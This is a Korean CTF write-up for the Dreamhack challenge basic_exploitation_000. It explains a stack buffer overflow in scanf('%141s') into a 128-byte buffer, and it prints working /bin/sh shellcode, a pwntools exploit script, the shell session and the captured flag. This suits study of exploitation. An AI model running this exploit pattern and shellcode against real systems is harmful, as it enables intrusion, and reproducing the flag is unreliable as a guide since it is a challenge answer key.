Description
이 문제는 서버에서 작동하고 있는 서비스(basic_exploitation_000)의 바이너리와 소스 코드가 주어집니다.
프로그램의 취약점을 찾고 익스플로잇해 셸을 획득한 후, “flag” 파일을 읽으세요.
“flag” 파일의 내용을 워게임 사이트에 인증하면 점수를 획득할 수 있습니다.
플래그의 형식은 DH{…} 입니다.
문제 파일을 받으면 소스코드와 실행파일이 존재한다.
basic_exploitation_000 실행파일을 checksec으로 확인해보면
ASLR, 스택 카나리 비활성화, 그리고 RWX 세그먼트가 존재한다고 나온다.
ubuntu@DESKTOP-1I4EUI3:~/CTF/dreamhack.io/basic_exploitation_000$ checksec --file basic_exploitation_000
[*] '/home/ubuntu/CTF/dreamhack.io/basic_exploitation_000/basic_exploitation_000'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
풀이
undefined4 main(void)
{
undefined local_84 [128];
initialize();
printf("buf = (%p)\n",local_84);
__isoc99_scanf("%141s",local_84);
return 0;
}
128 바이트 크기를 가진 buf를 scanf로 입력받는데,
이때 “%141s”가 있어 140바이트까지 입력받을 수 있다.
이러한 점을 이용하여 main의 return address를 조작해서 쉘코드를 실행시키게 하면 된다.
128바이트의 버퍼, main 이전 함수의 base pointer, 그리고 main() ret address까지 침범시켜서 덮어쓰면 된다.
scanf 함수는 \x09, \x0a, \x0b, \x0c, \x0d, \x20를 읽지 못하기 때문에
아래 26바이트의 쉘코드를 이용할 필요가 있었다.
\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80
페이로드를 작성하자면,
(26바이트의 쉘코드) + (buffer와 base pointer 공간을 채울 106 바이트의 더미 데이터) + (buf 포인터 주소)가 되겠다.
from pwn import *
context.log_level='debug'
p = remote("host3.dreamhack.games", 23097)
data = p.recvuntil(')')
buf = data.decode('ascii').split('(')[1].split(')')[0];
shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
payload = shellcode + b"\x90" * 106 + p32(int(buf, 16))
p.sendlineafter('\n', payload)
p.interactive()
ubuntu@WSL2:~/CTF/dreamhack.io/basic_exploitation_000$ python3 basic_exploitation_000.py
[+] Opening connection to host3.dreamhack.games on port 23097: Done
[*] Switching to interactive mode
$ ls
basic_exploitation_000
flag
run.sh
$ cat flag
DH{465dd453b2a25a26a847a93d3695676d}